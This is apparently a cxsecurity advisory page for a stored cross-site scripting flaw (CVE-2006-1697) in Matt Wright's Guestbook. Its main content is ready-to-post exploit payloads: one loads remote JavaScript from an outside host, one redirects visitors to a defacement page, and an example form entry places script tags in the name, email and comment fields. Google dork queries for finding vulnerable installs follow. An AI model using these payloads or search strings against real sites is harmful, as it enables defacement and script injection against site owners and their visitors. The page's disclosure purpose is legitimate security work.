Bug: Matt Wright Guestbook Xss Script Injection ( Ascii Version )

Search:
WLB2

Matt Wright Guestbook Xss Script Injection

Published
Credit
Risk
2006.04.10
Liz0ziM
Low
CWE
CVE
Local
Remote
N/A
CVE-2006-1697
Yes
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

Matt Wright Guestbook Xss Script Injection

----------------------------------------------------
site:http://www.scriptarchive.com/
demo:http://www.scriptarchive.com/readme/guestbook.html
--------------------------------------------------
Post This Code:

<script>alert(/Liz0ziM/)</script>

<script src=http://liz0.li.funpic.org/hacked.js></script>

<script>location.href="http://evilsite.com/deface.html";</script>

vs..
---------------------------------------------------------
Example Post Message :

Your Name:<script>alert(/Liz0ziM/)</script>
E-Mail:<script>alert(/Liz0ziM/)</script>
URL:blabla
City:blabla , State:blabla Country:blabla
Comments:<script>location.href="http://evilsite.com/deface.html";</scrip
t>

----------------------------------------------------------
Credit:Liz0ziM
Mail:liz0 (at) bsdmail (dot) com [email concealed]
Site:www.biyo.tk,www.biyosecurity.be
------------------------------------------------------------
Google:
"Scripts and guestbook created by: Matt Wright "
inurl:guestbook.html
inurl:addguest.html
inurl:"* Back to the Guestbook Entries"
---------------------------------------------------------------
Source:

http://www.blogcu.com/Liz0ziM/431712/
http://liz0zim.no-ip.org/mattguestbook.html

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version